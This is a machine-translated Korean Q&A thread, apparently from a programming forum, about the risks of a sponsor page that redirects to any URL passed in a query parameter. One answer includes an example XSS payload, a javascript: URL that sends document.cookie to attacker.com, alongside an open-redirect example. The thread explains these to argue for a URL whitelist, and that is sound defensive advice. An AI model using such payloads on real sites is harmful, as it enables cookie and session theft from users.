여기에서 웹 보안 문제를 찾을 수 있습니까?

Question

다음과 같은 다른 웹 페이지로 리디렉션하는 웹 페이지가 있습니다.

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

그런 다음 sponsor.php 페이지에는 전달 된 redirectpage로 연결되는 "Page On Page 계속"이라는 링크가있는 광고가 표시됩니다. 이것으로부터 발생할 수있는 보안/스푸핑 문제가 있습니까? 이것을 처리하는 가장 좋은 방법은 무엇입니까? (사용자는 어느 사이트에도 로그인되지 않았습니다)

Answer 1

큰 문제입니다. 다음과 같은 링크를 보내면 다음과 같습니다.

 http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

당신은 "오, CNN, 그건 합법적 인 사이트"라고 생각하고, 그것을 열고 '페이지 계속'링크를 클릭 할 것입니다. 그리고 당신은 그물에있는 가장 멋진 포르노 사이트 중 하나에있을 것이며 모든 동료들에게 거대한 호황을 누리고있는 남성 목소리가 있습니다. "내가 원하는!@$@#$ your!"그리고 당신은 당신의 상사에게 설명해야 할 것입니다"나는 그것이 CNN이라고 생각했습니다! "

여기 구멍은입니다 당신의 명성. 이와 같은 블라인드 리디렉션은 위험합니다.

그리고 그것은 단지 하나의 구멍입니다. 이건 어때?

 http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

이제 귀하의 사이트를 XSS-ED로 사용하고 사용자의 쿠키를 도난당했습니다. 물론 로그인 정보가 없지만 세션 데이터는 어떻습니까? 또는 나중에 로그인을 추가하거나 회사의 다른 사람이 1 년 후 사용자가 로그인하는 곳 에서이 페이지를 사용합니다.

Answer 2

이것은 확실히 보안 위험입니다. 보안이 관련 될 때 내 변수를 사용하지 않아야합니다.

완전히 안전한 것은 없지만이 문제를 처리하는 훨씬 더 나은 방법입니다. http://www.webmasterworld.com/forum88/2910.htm

Answer 3

Sponsor.php가 리디렉션 페이지에 값을 허용하고 광고가 승인을 암시하거나 사람들이 자신이 올바른 길을 가고 있다고 생각하도록 권장합니다. 더 나쁜 것은, 아마도 당신은 아마도 그 공격으로 이익을 얻을 것입니다.

허용 된 URL 목록 (또는 따를 수있는 패턴)을 유지하면 문제를 예방하기 위해 먼 길을 갈 수 있습니다.